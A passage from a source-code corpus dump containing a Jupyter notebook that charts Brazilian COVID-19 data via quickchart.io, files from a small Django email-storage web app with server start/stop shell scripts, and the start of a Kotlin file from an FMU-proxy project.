In[30]:\n\n\nfinal_data\n\n\n# In[31]:\n\n\nfinal_data.insert(0, ['Confirmados', 'Obitos', 'recuperados', 'Ativos', 'data'])\n\n\n# In[32]:\n\n\nfinal_data\n\n\n# In[33]:\n\n\nCONFIRMADOS = 0\nOBITOS = 1\nRECUPERADOS = 2\nATIVOS = 3\nDATA = 4\n\n\n# In[34]:\n\n\nfor i in range(1, len(final_data)):\n final_data[i][DATA] = final_data[i][DATA][:10] \n\n\n# In[35]:\n\n\nfinal_data\n\n\n# In[36]:\n\n\nimport datetime as dt\n\n\n# In[37]:\n\n\nprint(dt.time(12, 6, 21, 7), 'Hora:minuto:segundo.microsegundo')\nprint('----')\nprint(dt.date(2020, 4, 25), 'Ano-mês-dia')\nprint('----')\nprint(dt.datetime(2020, 4, 25, 12, 6, 21, 7), 'Anoe-mês-dia Hora:minuto:segundo.microsegundo')\n\n\n# In[38]:\n\n\nnatal = dt.date(2020, 12, 25)\nreveillon =dt.date(2021, 1, 1)\n\nprint(reveillon - natal)\nprint((reveillon - natal).days)\nprint((reveillon - natal).seconds)\nprint((reveillon - natal). 
microseconds)\n\n\n# In[39]:\n\n\nimport csv\n\n\n# In[40]:\n\n\nwith open('brasil-covid.csv', 'w') as file:\n writer = csv.writer(file)\n writer.writerows(final_data)\n\n\n# In[41]:\n\n\nfor i in range(1, len(final_data)):\n final_data[i][DATA] = dt.datetime.strptime(final_data[i][DATA], '%Y-%m-%d')\n\n\n# In[42]:\n\n\nfinal_data\n\n\n# In[43]:\n\n\ndef get_datasets(y, labels):\n if type(y[0])== list:\n datasets = []\n for i in range(len(y)):\n datasets.append({\n 'label': labels[i],\n 'data': y[i]\n })\n return datasets\n else:\n return [\n {\n 'label': labels[0],\n 'data': y\n }\n ]\n \n\n\n# In[44]:\n\n\ndef set_title(title= ' '):\n if title != ' ':\n display = 'true'\n else:\n display = 'false'\n return{\n 'title': title,\n 'display': display\n }\n\n\n# In[70]:\n\n\ndef create_chart(x, y, labels, kind= 'bar', title= ''):\n \n datasets = get_datasets(y, labels)\n options = set_title(title)\n \n chart = {\n 'type': kind,\n 'data':{\n 'labels': x,\n 'datasets': datasets\n },\n 'options': options\n }\n \n return chart\n\n\n# In[71]:\n\n\ndef get_api_chart(chart):\n url_base = 'https://quickchart.io/chart'\n resp = r.get(f'{url_base}?c={str(chart)}')\n return resp.content\n\n\n# In[78]:\n\n\ndef save_image(path, content):\n with open(path, 'wb') as image:\n image.write(content)\n\n\n# In[79]:\n\n\nfrom PIL import Image\n\nfrom IPython.display import display\n\n\n# In[80]:\n\n\ndef display_image(path):\n img_pil = Image.open(path)\n display(img_pil)\n\n\n# In[81]:\n\n\n\ny_data_1 = []\nfor obs in final_data[1::10]:\n y_data_1.append(obs[CONFIRMADOS])\n \ny_data_2 = []\nfor obs in final_data[1::10]:\n y_data_2.append(obs[RECUPERADOS])\n \nlabels = ['Confirmados', 'Recuperados']\n\nx = []\nfor obs in final_data[1::10]:\n x.append(obs[DATA].strftime('%d/%m/%Y'))\n \nchart = create_chart(x, [y_data_1, y_data_2], labels, title='Gráfico Confirmados x Recuperados')\nchart_content = get_api_chart(chart)\nsave_image('meu-primeiro-grafico.png', chart_content)\n\ndisplay_image('meu-primeiro-grafico.png')\n \n\n\n# In[88]:\n\n\nfrom urllib.parse import quote\n\n\n# In[89]:\n\n\ndef get_api_qrcode(link):\n text = quote(link) # parsing do link para url\n url_base = 'https://quickchart.io/qr'\n resp = r.get(f'{url_base}?text={text}')\n return resp.content\n\n\n# In[90]:\n\n\nurl_base = 'https://quickchart.io/chart'\nlink = f'{url_base}?c={str(chart)}'\nsave_image('qr-code.png', get_api_qrcode(link))\ndisplay_image('qr-code.png')\n\n\n# In[ ]:\n\n\n\n\n" } ]
1
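
A condensed sketch of the two QuickChart round trips the notebook above performs, stripped of the COVID data; the chart payload here is a toy example, while the `c` and `text` query parameters mirror the notebook's own usage.

import requests
from urllib.parse import quote

chart = {
    'type': 'bar',
    'data': {'labels': ['a', 'b'],
             'datasets': [{'label': 'demo', 'data': [1, 2]}]},
}

# chart endpoint: the stringified dict is passed as the `c` parameter
png = requests.get(f"https://quickchart.io/chart?c={str(chart)}").content
with open('demo-chart.png', 'wb') as image:
    image.write(png)

# qr endpoint: the target link must be percent-encoded first
link = quote("https://example.com")
qr = requests.get(f"https://quickchart.io/qr?text={link}").content
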
LarryMasc/lankinc
https://github.com/LarryMasc/lankinc
f7f364e799ec7bb984cf227bb7fc2936f5196c1b
29b2f785d9cc62a53598958d17735075aa300d7e
278677c634bcfe3f93755174cec21b9638b79b4d
refs/heads/master
2020-04-13T06:21:13.281551
2019-04-14T21:03:39
2019-04-14T21:03:39
163,017,951
0
1
null
2018-12-24T19:14:05
2018-12-30T21:24:05
2019-04-14T21:03:40
JavaScript
[ { "alpha_fraction": 0.7342657446861267, "alphanum_fraction": 0.7342657446861267, "avg_line_length": 19.428571701049805, "blob_id": "e7fa56668f6d63376b630ac09b23b9f5d301ed3b", "content_id": "a2e7efae2e8247ec76fae2a6cc09169312ce523c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 143, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/django/core/filters.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "import django_filters\n\nfrom .models import email_data\n\nclass EmailFilter(django_filters.Filterset):\n class Meta:\n model = email_data\n" }, { "alpha_fraction": 0.6566383242607117, "alphanum_fraction": 0.6566383242607117, "avg_line_length": 50, "blob_id": "cb92eb9eb6617d923c0bbdbe470a78169c0ada0c", "content_id": "f18d2da3d4f8f8e046a3a0a1d6eeddfb007f5b36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1529, "license_type": "no_license", "max_line_length": 100, "num_lines": 30, "path": "/django/core/urls.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.urls import path\n\n# from . import views\nfrom .views import core_view, email_create, email_delete, email_detail,EmailFilter, \\\n email_update, home_view, home_view_core, pic_gallery, send_email_msg, send_msg, show_all_email,\\\n show_all_users, signup, sign_up, view_sent_email\n\nfrom django_filters.views import FilterView\n\napp_name = 'core'\n\nurlpatterns = [\n path('core/', core_view.as_view()),\n path('core/pics/', pic_gallery.as_view()),\n path('core/send_msg/', send_msg, name='send_email_msg'),\n path('core/send_email_msg/', send_email_msg.as_view(), name='send_email_msg'),\n path('core/signup/', signup, name='signup'),\n path('core/view_sent_email/', view_sent_email),\n path('core/sign_up/', sign_up.as_view(), name='sign_up'),\n path('core/show_all_email/', show_all_email.as_view(), name=\"show_all_email\"),\n path('core/show_all_users/', show_all_users.as_view(), name=\"show_all_users\"),\n # path('core/<int:pk>/', email_detail.as_view(), name=\"email_detail\"),\n path('core/<int:id>/', email_detail.as_view(), name=\"email_detail\"),\n path('core/<int:id>/update/', email_update.as_view(), name=\"email_update\"),\n path('core/<int:id>/delete/', email_delete.as_view(), name=\"email_delete\"),\n path('core/create_email/', email_create.as_view(), name=\"email_create\"),\n path('core/home/', home_view_core.as_view(), name='core_home'),\n path('core/search/', FilterView.as_view(filterset_class=EmailFilter), name='search'),\n path('', home_view.as_view(), name='app_home'),\n]" }, { "alpha_fraction": 0.39878949522972107, "alphanum_fraction": 0.40147948265075684, "avg_line_length": 37.128204345703125, "blob_id": "4dc01365b826605bdcf6d4746ec7757fd0153966", "content_id": "99a9a0fbb13ad3683672bc38142ee37c71d5f535", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1487, "license_type": "no_license", "max_line_length": 83, "num_lines": 39, "path": "/django/core/forms.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django import forms\n\nfrom .models import email_data\n\n\nclass send_msg_form(forms.ModelForm):\n sender = forms.EmailField(label=\"Sender\", widget=forms.TextInput(\n attrs={\n \"placeholder\": \"[email protected]\",\n }\n ))\n class Meta:\n model = email_data\n fields = [\n 'sender',\n 'recipient',\n 'subject',\n 'body',\n 'cc_myself',\n ]\n 
def clean_sender(self, *args, **kwargs):\n sender = self.cleaned_data.get(\"sender\")\n # if not \"[email protected]\" in sender:\n # raise forms.ValidationError(\"Sender can only be [email protected]\")\n return sender\n\n# class send_msg_form(forms.Form):\n# sender = forms.EmailField(label=\"Sender\")\n# recipient = forms.EmailField(label=\"Recipient\")\n# subject = forms.CharField(label=\"Subject\")\n# body = forms.CharField(label=\"Message\",\n# widget=forms.Textarea(\n# attrs={\n# \"class\": \"new-class-name two\",\n# \"rows\": 24,\n# \"cols\": 80,\n# }\n# ))\n# cc_myself = forms.BooleanField(required=False)\n" }, { "alpha_fraction": 0.49975454807281494, "alphanum_fraction": 0.5355915427207947, "avg_line_length": 19.785715103149414, "blob_id": "7d8e913a9a80c14ba62fdd481ff322cb7b1a8486", "content_id": "784265dbac3b31e9fe279203a4705bfa68738392", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2037, "license_type": "no_license", "max_line_length": 75, "num_lines": 98, "path": "/rc.django", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nLOG=\"/u/logs/django_server_lankinc.log\"\n\nDJANGO_HOME=\"/u/gitwork/lankinc\"\nDJANGO_APP=\"${DJANGO_HOME}/django\"\n\naction=$1\n\necho \"Django Webserver has been moved to Apache\"\nexit 1\n# \ncheck_venv () {\n # If the VIRTUAL_ENV variable is not defined\n # then there is no VENV.\n if [[ -z \"${VIRTUAL_ENV}\" ]]\n then\n cd ${DJANGO_HOME}\n if [[ -d venv ]]\n then\n echo \"No Virtual ENV running. Activating..\"\n source venv/bin/activate\n cd\n else\n echo \"No Virtual Environment available...exiting..\"\n exit 1\n fi\n fi\n}\n\ndjango_state() {\n DJANGO_PID=`lsof -i :8008 | egrep TCP | awk '{print $2}'`\n if [[ \"${DJANGO_PID}\" != \"\" ]]\n then\n echo \"Django is running on PID --> ${DJANGO_PID}\"\n else\n echo \"Django Server is not running\"\n fi\n }\n\ndjango_start() {\n # set -x\n check_venv\n echo \"Starting Django Server on `date`\" | tee -a ${LOG}\n #nohup ./manage.py runserver 172.31.251.63:8008 >> ${LOG} 2>&1 &\n\n # Will start the server in the django/bookstore directory\n cd ${DJANGO_APP}\n if [[ -f manage.py ]]\n then\n # nohup ./manage.py runserver 172.31.251.63:8008 >> ${LOG} 2>&1 &\n # nohup python ./manage.py runserver 0.0.0.0:8008 1>>${LOG} 2>&1 &\n nohup ./manage.py runserver 0.0.0.0:8008 1>>${LOG} 2>&1 &\n sleep 5\n django_state\n else\n echo \"Not a valid DJANGO directory --> `pwd` <--. 
Exiting\"\n exit 1\n fi\n}\n\ndjango_stop() {\n echo \"Stopping django `date`\" | tee -a ${LOG}\n DJANGO_PID=`lsof -i :8008 | egrep TCP | awk '{print $2}'`\n if [[ \"${DJANGO_PID}\" != \"\" ]]\n then\n kill -15 ${DJANGO_PID}\n sleep 2\n fi\n django_state\n}\n\n# Main\n\ncase ${action} in\n\nstart) \n django_start\n ;;\n\nstop)\n django_stop\n ;;\n\nstatus)\n django_state\n ;;\n\nrestart)\n django_stop\n django_start\n ;;\n\n*)\n echo \"Usage : ./rc.django [start|stop|status]\"\n exit 1\n ;;\nesac\n" }, { "alpha_fraction": 0.4679029881954193, "alphanum_fraction": 0.4736091196537018, "avg_line_length": 32.380950927734375, "blob_id": "bbb8a4611b27343076238808878784fd1459eef2", "content_id": "766a3572d81061905b0cf6aee01a3a8fb249159e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 701, "license_type": "no_license", "max_line_length": 73, "num_lines": 21, "path": "/django/templates/index.html", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "{% extends 'base.html' %}\n\n{% block content %}\n {% if user.is_authenticated %}\n <h1>Hello {{ user.first_name }} {{ user.last_name }}!</h1>\n <p>Joining Date : {{ user.date_joined }}</p>\n <p>Last Logged in : {{ user.last_login }}</p>\n <p>Active User : {{ user.is_active }}</p>\n {% else %}\n <!--<p><a href=\"{% url 'core:signup' %}\">Core Sign Up</a> </p>-->\n <h3>Login</h3>\n <form method=\"post\">\n {% csrf_token %}\n {{ form.as_p }}\n <button type=\"submit\">Login</button>\n </form>\n <p><a href=\"{% url 'users:signup' %}\">Users Sign Up</a> </p>\n <p><a href=\"{% url 'login' %}\">Login</a> </p>\n {% endif %}\n\n{% endblock %}\n" }, { "alpha_fraction": 0.4375, "alphanum_fraction": 0.4375, "avg_line_length": 15, "blob_id": "b1a25c6f9b98aa5471ceb724bb6d3a2a8bd041ef", "content_id": "0742a02fd07e0af8bba16bdb2e6bad597a39b01a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 16, "license_type": "no_license", "max_line_length": 15, "num_lines": 1, "path": "/README.md", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "# L.A.N.K. 
Inc.\n" }, { "alpha_fraction": 0.629901647567749, "alphanum_fraction": 0.6322710514068604, "avg_line_length": 26.769737243652344, "blob_id": "af0f8b0fd202fec2d162029983fef9f12fb208cd", "content_id": "ab0ace5c5ebde6f0931d4c0acaf4c61a489997fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8441, "license_type": "no_license", "max_line_length": 81, "num_lines": 304, "path": "/django/core/views.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nfrom django.views.generic import (\n CreateView, DeleteView, DetailView, FormView, ListView, TemplateView,\n UpdateView, View\n )\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django.core.paginator import Paginator\nimport django_filters\n\nfrom .forms import send_msg_form\nfrom .models import email_data\n\nfrom users.models import CustomUser\n\n\"\"\"\nToDo\n - Filter to display all emails by ID ASC\n - Elastic Search Integration\n - Every item in the ListView should be selectable for\n - Update\n - Delete \n\n - Password Reset, Password Change\n\n - Confirm via e-mail\n - Social Media Registration\n\nComplete\n - Admin Extensions\n - Pagination\n - Picture Gallery\n - Login, Logout\n - Register\n\nReference\n - Unicode Symbols https://www.w3schools.com/charsets/ref_utf_punctuation.asp\n\"\"\"\n\n# All Class-based-views\nclass core_view(TemplateView):\n template_name = \"core/core_index.html\"\n\n\nclass home_view(TemplateView):\n template_name = \"index.html\"\n\n\nclass home_view_core(View):\n template_name = \"core/index.html\"\n def get(self, request, *args, **kwargs):\n count = CustomUser.objects.count()\n context = {\n 'count': count\n }\n return render(request, self.template_name, context)\n\n# class 123\n\n\nclass pic_gallery(TemplateView):\n template_name = \"core/picture_gallery.html\"\n\n\n# Signup forms\nclass sign_up(FormView):\n \"\"\"This class signs user into the DB.\"\"\"\n template_name = \"core/signup.html\"\n def get(self, request):\n form = UserCreationForm()\n context = {\n 'form': form\n }\n return render(request, self.template_name, context)\n\n\n def post(self, request, *args, **kwargs):\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return render(request, \"core/signup_successful.html\")\n\n\n# List all the sent e-mails\nclass show_all_users(ListView):\n r\"\"\"ListView using ClassView\n\n In a listview, the defaults are as followw\n template_name = <app>/<model>_<view>.html\n\n eg below shows how the class would be defined if the defaults are not\n used.\n\n class show_all_email(ListView)\n template_name = \"core/email_data_list.html\"\n def get(self, request):\n queryset = email_data.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, self.template_name, context)\n \"\"\"\n # queryset = email_data.objects.all()\n # queryset = email_data.objects.order_by(\"-id\").filter(sender=\"[email protected]\")\n template_name = \"core/CustomUser_list.html\"\n\n def get(self, request, *args, **kwargs):\n queryset = CustomUser.objects.order_by(\"first_name\")\n paginate_by = 10\n count_users = CustomUser.objects.count()\n context = {\n 'queryset': queryset,\n 'paginate_by': paginate_by,\n 'count_users': count_users\n }\n print(context)\n return render(request, self.template_name, context)\n\n# Send email\nclass send_email_msg(FormView):\n 
\"\"\"This class will send emails and insert into the DB.\"\"\"\n template_name = \"core/send_msg.html\"\n def get(self, request, *args, **kwargs):\n form = send_msg_form() # No request.GET else form validation takes place.\n context = {\n 'form': form\n }\n return render(request, self.template_name, context)\n\n def post(self, request, *args, **kwargs):\n form = send_msg_form(request.POST)\n if form.is_valid():\n form.save()\n # return redirect('/')\n return render(request, 'core/send_msg_successful.html')\n\n\n# List all the sent e-mails\nclass show_all_email(ListView):\n r\"\"\"ListView using ClassView\n\n In a listview, the defaults are as followw\n template_name = <app>/<model>_<view>.html\n\n eg below shows how the class would be defined if the defaults are not\n used.\n\n class show_all_email(ListView)\n template_name = \"core/email_data_list.html\"\n def get(self, request):\n queryset = email_data.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, self.template_name, context)\n \"\"\"\n # queryset = email_data.objects.all()\n # queryset = email_data.objects.order_by(\"-id\").filter(sender=\"[email protected]\")\n template_name = \"core/email_data_list.html\"\n queryset = email_data.objects.order_by(\"-id\")\n paginate_by = 10\n\n\n# Show details of a row\nclass email_detail(DetailView):\n r\"\"\"Display details of a row using Classviews.\n\n In a detailview, the defaults are as followw\n template_name = <app>/<model>_<view>.html\n\n eg below shows how the class would be defined if the defaults are not\n used.\n\n class email_detail(DetailView)\n template_name = \"core/email_data_detail.html\"\n def get(self, request):\n queryset = email_data.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, self.template_name, context)\n \"\"\"\n # queryset = email_data.objects.all()\n template_name = \"core/email_data_detail.html\"\n def get_object(self, queryset=None):\n id_ = self.kwargs.get(\"id\")\n return get_object_or_404(email_data, id=id_)\n\n\n# Create view\nclass email_create(CreateView):\n r\"\"\"Example of CreateView using ClassViews.\n\n \"\"\"\n template_name = \"core/email_data_create.html\"\n form_class = send_msg_form\n queryset = email_data.objects.all()\n # success_url = \"/\"\n\n r\"\"\"Display details of the form in the server log.\"\"\"\n def form_valid(self, form):\n print(form.cleaned_data)\n return super().form_valid(form)\n\n # def get_success_url(self):\n # return \"/\"\n\n\n# Create view\nclass email_update(UpdateView):\n r\"\"\"Example of UpdateView using ClassViews.\n\n \"\"\"\n template_name = \"core/email_data_create.html\"\n form_class = send_msg_form\n # Not needed queryset = email_data.objects.all()\n\n def get_object(self, queryset=None):\n id_ = self.kwargs.get(\"id\")\n return get_object_or_404(email_data, id=id_)\n\n r\"\"\"Display details of the form in the server log.\"\"\"\n def form_valid(self, form):\n print(form.cleaned_data)\n return super().form_valid(form)\n\n\n# Delete a row\nclass email_delete(DeleteView):\n r\"\"\"Delete a row using Classviews.\"\"\"\n # queryset = email_data.objects.all()\n template_name = \"core/email_data_delete.html\"\n\n def get_object(self, queryset=None):\n id_ = self.kwargs.get(\"id\")\n return get_object_or_404(email_data, id=id_)\n\n def get_success_url(self):\n return reverse(\"core:show_all_email\")\n\n\nclass EmailFilter(django_filters.FilterSet):\n class Meta:\n model = email_data\n fields = ['sender', 'recipient', 'subject']\n\n\n\n\n# ALL 
Function-based-views below.\n# def send_msg(request):\n# form = send_msg_form(request.GET)\n# if request.method == \"POST\":\n# form = send_msg_form(request.POST)\n# if form.is_valid():\n# # form.save()\n# print(form.cleaned_data)\n# email_data.objects.create(**form.cleaned_data)\n# else:\n# print(form.errors)\n# context = {\n# 'form': form\n# }\n# return render(request, 'core/send_msg.html', context)\n\ndef home(request):\n count = User.objects.count()\n context = {\n 'count': count\n }\n return render(request, \"core/index.html\", context)\n\n# Display all signed-up users\ndef view_sent_email(request):\n template_name = \"core/email_data_list.html\"\n queryset = email_data.objects.all()\n context = {\n 'object_list': queryset\n }\n return render(request, template_name, context)\n\n\n# Function based view send_msg moved tp class based view send_email_msg\ndef send_msg(request):\n form = send_msg_form(request.POST or None)\n if form.is_valid():\n form.save()\n context = {\n 'form': form\n }\n return render(request, 'core/send_msg.html', context)\n\n\n# Function based view signup moved to class based view\ndef signup(request):\n form = UserCreationForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('/')\n context = {\n 'form': form\n }\n return render(request, \"core/signup.html\", context)" }, { "alpha_fraction": 0.6751677989959717, "alphanum_fraction": 0.6751677989959717, "avg_line_length": 31.39130401611328, "blob_id": "2483b47d2fbb4a859a9f0ad8db74acae898df488", "content_id": "f7ae4d22e00e05a762829f6b99edbe854525c1ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 745, "license_type": "no_license", "max_line_length": 68, "num_lines": 23, "path": "/django/core/admin.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.contrib import admin\n\n\n# Register your models here.\n\n# The ModelAdmin class is not required if no custom values are\n# defined\nfrom .models import email_data\n\nclass ManageEmailData(admin.ModelAdmin):\n date_hierarchy = 'send_time'\n fields = ('sender', 'recipient', 'subject', 'send_time', 'body')\n list_display = ('sender', 'recipient', 'subject', 'send_time')\n list_display_links = ('sender', 'recipient', 'subject', )\n filter_horizontal = True\n list_filter = ('sender', 'recipient', 'send_time', 'cc_myself')\n save_on_top = True\n save_as = True\n search_fields = ['sender', 'recipient', 'subject' ]\n show_full_result_count = True\n view_on_site = True\n\nadmin.site.register(email_data, ManageEmailData)\n" }, { "alpha_fraction": 0.47948163747787476, "alphanum_fraction": 0.4881209433078766, "avg_line_length": 24.77777862548828, "blob_id": "e4c83b24189a3496beb377174875b694a0f32b7b", "content_id": "642eafdd2c45c8f09dbb70a61bfba0458a1484be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 463, "license_type": "no_license", "max_line_length": 71, "num_lines": 18, "path": "/django/core/templates/core/email_data_delete.html", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "{% extends \"base.html\" %}\n\n{% block content %}\n<form action=\".\" method=\"POST\">\n {% csrf_token %}\n <h3>Do you want to delete the following email :</h3>\n <pre>\n <h4>\n Sender : {{ object.sender }}\n Recipient : {{ object.sender }}\n Subject : {{ object.subject }}\n Body : {{ object.body }}\n </h4>\n <p><input type=\"submit\" value=\"Yes\" /> <a href=\"../\">Cancel</a>\n </p>\n </pre>\n</form>\n{% 
endblock %}" }, { "alpha_fraction": 0.6805292963981628, "alphanum_fraction": 0.6843100190162659, "avg_line_length": 36.82143020629883, "blob_id": "e9e91f1db9ea3178e08e110634d07e8a1a3d92cd", "content_id": "0e6c67554709f35ccc7dd74ea88b4fb9b484f741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1058, "license_type": "no_license", "max_line_length": 75, "num_lines": 28, "path": "/django/core/models.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.utils.timezone import now\nfrom django.urls import reverse\n\n# Create your models here.\nclass email_data(models.Model):\n r\"\"\"DB table to store all e-mail communication.\n\n In this table I will store the followin\n sender -- Sender's email address\n receiver -- Receiver's email address\n subject -- Subject of the Message\n body -- Body of the message\n send_time -- Timestamp when the message was sent\n email_tag -- Tag used for this message. Can be used for email. threads\n id -- Primary Key field which will be Big-Auto\n \"\"\"\n sender = models.EmailField()\n recipient = models.EmailField()\n subject = models.CharField(max_length=70)\n body = models.TextField()\n send_time = models.DateTimeField(default=now, blank=True)\n cc_myself = models.BooleanField()\n email_tag = models.CharField(max_length=32)\n id = models.BigAutoField(primary_key=True)\n\n def get_absolute_url(self):\n return reverse(\"core:email_detail\", kwargs={\"id\": self.id})" }, { "alpha_fraction": 0.5346985459327698, "alphanum_fraction": 0.5631399154663086, "avg_line_length": 30.39285659790039, "blob_id": "98681127dd0d94925d538662a122cffde1eb59aa", "content_id": "8b00149cfd72ce84486a874f810262d5ceb91175", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 879, "license_type": "no_license", "max_line_length": 99, "num_lines": 28, "path": "/django/core/migrations/0001_initial.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "# Generated by Django 2.1.4 on 2018-12-25 17:02\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='email_data',\n fields=[\n ('sender', models.EmailField(max_length=254)),\n ('recipient', models.EmailField(max_length=254)),\n ('subject', models.CharField(max_length=70)),\n ('body', models.TextField()),\n ('send_time', models.DateTimeField(blank=True, default=django.utils.timezone.now)),\n ('cc_myself', models.BooleanField()),\n ('email_tag', models.CharField(max_length=32)),\n ('id', models.BigAutoField(primary_key=True, serialize=False)),\n ],\n ),\n ]\n" }, { "alpha_fraction": 0.5011876225471497, "alphanum_fraction": 0.5118764638900757, "avg_line_length": 14.592592239379883, "blob_id": "b5bae3a15f6c9486adaeba94f21dbfbc065dee4e", "content_id": "27e1d26ff3e2a4727ae8ad30641cade6c2747301", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 842, "license_type": "no_license", "max_line_length": 79, "num_lines": 54, "path": "/rc.apache", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [[ `pwd` = \"/u/gitwork/lank\" ]]\nthen\n echo \"LANK not ready for Apache yet\"\n exit 1\nfi\n\nID=`id -u`\nif [[ ${ID} -ne 0 ]]\nthen\n echo \"Please submit as root.\"\n exit 
1\nfi\n\naction=$1\nAPACHE_HOME=\"/usr/local/apache2\"\ncd $APACHE_HOME/bin\n\nstatus(){\n APACHE_STATUS=`ps -aef|egrep /usr/local/apache2/bin/httpd | egrep -cv grep`\n if [[ ${APACHE_STATUS} -gt 0 ]]\n then\n echo \"Apache Server is running\"\n else\n echo \"Apache Server is down\"\n fi\n}\n\ncase ${action} in \n start)\n ./apachectl start\n status\n ;;\n\n stop)\n ./apachectl stop\n sleep 2\n status\n ;; \n\n restart)\n ./apachectl restart\n status\n ;;\n\n status)\n status\n ;;\n\n *)\n echo \"Invalid option. Exiting..\"\n exit 1\nesac\n" }, { "alpha_fraction": 0.6815286874771118, "alphanum_fraction": 0.6815286874771118, "avg_line_length": 18.75, "blob_id": "d2231bc397f659779a5a4d8bfa4dc969e3e4bc06", "content_id": "84983ed56ac012088cda96f60f3a0c737994c377", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 54, "num_lines": 8, "path": "/django/users/urls.py", "repo_name": "LarryMasc/lankinc", "src_encoding": "UTF-8", "text": "from django.urls import path, include\n\napp_name = 'users'\nfrom .views import signup\n\nurlpatterns = [\n path('signup/', signup.as_view(), name = \"signup\")\n]" } ]
13
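
A minimal sketch of exercising the lankinc `send_msg_form` from the record above outside a view, e.g. in a Django shell or test; the addresses are placeholders, and it assumes the project's settings are already configured so the core app can be imported.

from core.forms import send_msg_form

payload = {
    'sender': 'sender@example.com',        # placeholder addresses
    'recipient': 'recipient@example.com',
    'subject': 'hello',
    'body': 'test message',
    'cc_myself': True,
}

form = send_msg_form(payload)
if form.is_valid():
    email = form.save()                    # persists an email_data row
    print(email.get_absolute_url())        # -> /core/<id>/ via core:email_detail
else:
    print(form.errors)
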
johanrhodin/FMU-proxy
https://github.com/johanrhodin/FMU-proxy
d7ac234c5dbb2b0c8259cc7d331044c474487a5e
7f792a04bba6cd810d45f92a2f1f48034fb95009
c1b763765f1d613d01a276d78eacf1cc9db680ef
refs/heads/master
2020-03-20T20:59:59.611869
2018-06-08T11:56:32
2018-06-08T11:56:32
137,718,038
0
0
null
2018-06-18T06:41:37
2018-06-08T11:56:36
2018-06-15T08:42:04
null
[ { "alpha_fraction": 0.737044632434845, "alphanum_fraction": 0.7392680048942566, "avg_line_length": 40.76785659790039, "blob_id": "29c70838140704d8a0aaefd62f88bbeb69235b46", "content_id": "01aff94cf7fbff98a87a671941d8fcd5920b8764", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 11694, "license_type": "permissive", "max_line_length": 123, "num_lines": 280, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/avro/extensions.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.avro\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.misc.LogCategories\nimport no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment\nimport 